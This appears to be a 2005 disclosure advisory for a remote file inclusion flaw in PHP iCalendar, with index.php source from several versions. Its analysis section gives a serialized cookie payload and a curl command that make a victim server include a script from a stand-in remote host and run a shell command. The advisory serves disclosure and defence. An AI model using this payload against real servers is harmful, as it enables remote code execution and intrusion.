PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong input validation in index.php and will include an arbitrary file ending with .php.
Se siete italiani leggete adv.txt e tra le bestemmie troverete di sicuro maggiori informazioni.
Urls
http://www_ush_it/2005/10/25/php-icalendar-css/
http://www_ush_it/team/ascii/hack-PHP-iCalendar/adv.txt
http://www_ush_it/team/ascii/hack-PHP-iCalendar/advisory.txt
Advisory
PHP iCalendar CSS Name Cross-Site-Scripting Vulnerabilities in PHP iCalendar Systems Affected PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 Severity Medium Risk Vendor http://www.phpicalendar.net Advisory http://www_ush_it/2005/10/25/php-icalendar-css/ Additional (it) http://www_ush_it/team/ascii/hack-PHP-iCalendar/adv.txt Author Francesco 'aScii' Ongaro (ascii at katamail . com) Date 20051023 I. BACKGROUND PHP iCalendar is a php calendar, more information is available at the vendor site. II. DESCRIPTION PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong input validation in index.php and will include an arbitrary file ending with .php. The vulnerable code is: > config.inc.php $printview_default = 'no'; > index.php if (isset($_COOKIE['phpicalendar'])) { $phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar'])); $default_view = $phpicalendar['cookie_view']; } if ($printview_default == 'yes') { $printview = $default_view; $default_view = "print.php"; } else { $default_view = "$default_view".".php"; } include($default_view); As you can see there is no input validation at all. III. ANALYSIS This vulnerability can be exploited using an hand-crafted cookie with the right serialized array inside. a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";} curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww_ush_it%2Fteam%2Fascii%2F-----%22 %3B%7D' -d 'user=uname -a' IV. DETECTION PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable. V. WORKAROUND Input validation or header location will fix the vulnerability. PHP no remote fopen and open basedir will play also (if not..). VI. VENDOR RESPONSE Vendor fixed the bug in the cvs tree, not verified. http://www_ush_it/team/ascii/hack-PHP-iCalendar/mail1.txt http://www_ush_it/team/ascii/hack-PHP-iCalendar/mail2.txt VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20051023 Bug discovered 20051024 Working exploit written 20051025 Sikurezza.org notification 20051025 Initial vendor notification 20051025 Initial vendor response 20051025 Vendor CVS fix 20051025 Public disclosure IX. CREDIT ascii is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2005 Francesco 'aScii' Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
How to get a non-parsed .php file (whole directory)?
Just put in an .htaccess (you need the needed override power) this:
AddType text/html .php
0.7
< ?php
include "./config.inc.php";
$default_view = "$default_view" . ".php";
header("Location: $default_view");
?>
0.8
< ?php
include "./config.inc.php";
$default_view = "$default_view" . ".php";
header("Location: $default_view");
?>
0.9
< ?php
include "./config.inc.php";
if ($HTTP_COOKIE_VARS['phpicalendar']) {
$phpicalendar = unserialize(stripslashes($HTTP_COOKIE_VARS['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
header("Location: $default_view");
?>
0.9.5
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($HTTP_COOKIE_VARS['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($HTTP_COOKIE_VARS['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
header("Location: $default_view");
?>
1.0
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($HTTP_COOKIE_VARS['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($HTTP_COOKIE_VARS['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
header("Location: $default_view");
?>
1.1
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($HTTP_COOKIE_VARS['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($HTTP_COOKIE_VARS['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
header("Location: $default_view");
?>
2.0a2
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($HTTP_COOKIE_VARS['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($HTTP_COOKIE_VARS['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
/*header("Location: $default_view");*/
include( $default_view );
?>
2.0b
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($_COOKIE['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$default_view = "print.php?printview=$default_view";
} else {
$default_view = "$default_view" . ".php";
}
/*header("Location: $default_view");*/
include( $default_view );
?>
2.0c
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($_COOKIE['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$printview = $default_view;
$default_view = "print.php";
} else {
$default_view = "$default_view" . ".php";
}
/*header("Location: $default_view");*/
include( $default_view );
?>
2.0.1
< ?php
if (!isset($ALL_CALENDARS_COMBINED)) $ALL_CALENDARS_COMBINED = 'all_calendars_combined971';
include "./config.inc.php";
if (isset($_COOKIE['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}
if ($printview_default == 'yes') {
$printview = $default_view;
$default_view = "print.php";
} else {
$default_view = "$default_view" . ".php";
}
/*header("Location: $default_view");*/
include( $default_view );
?>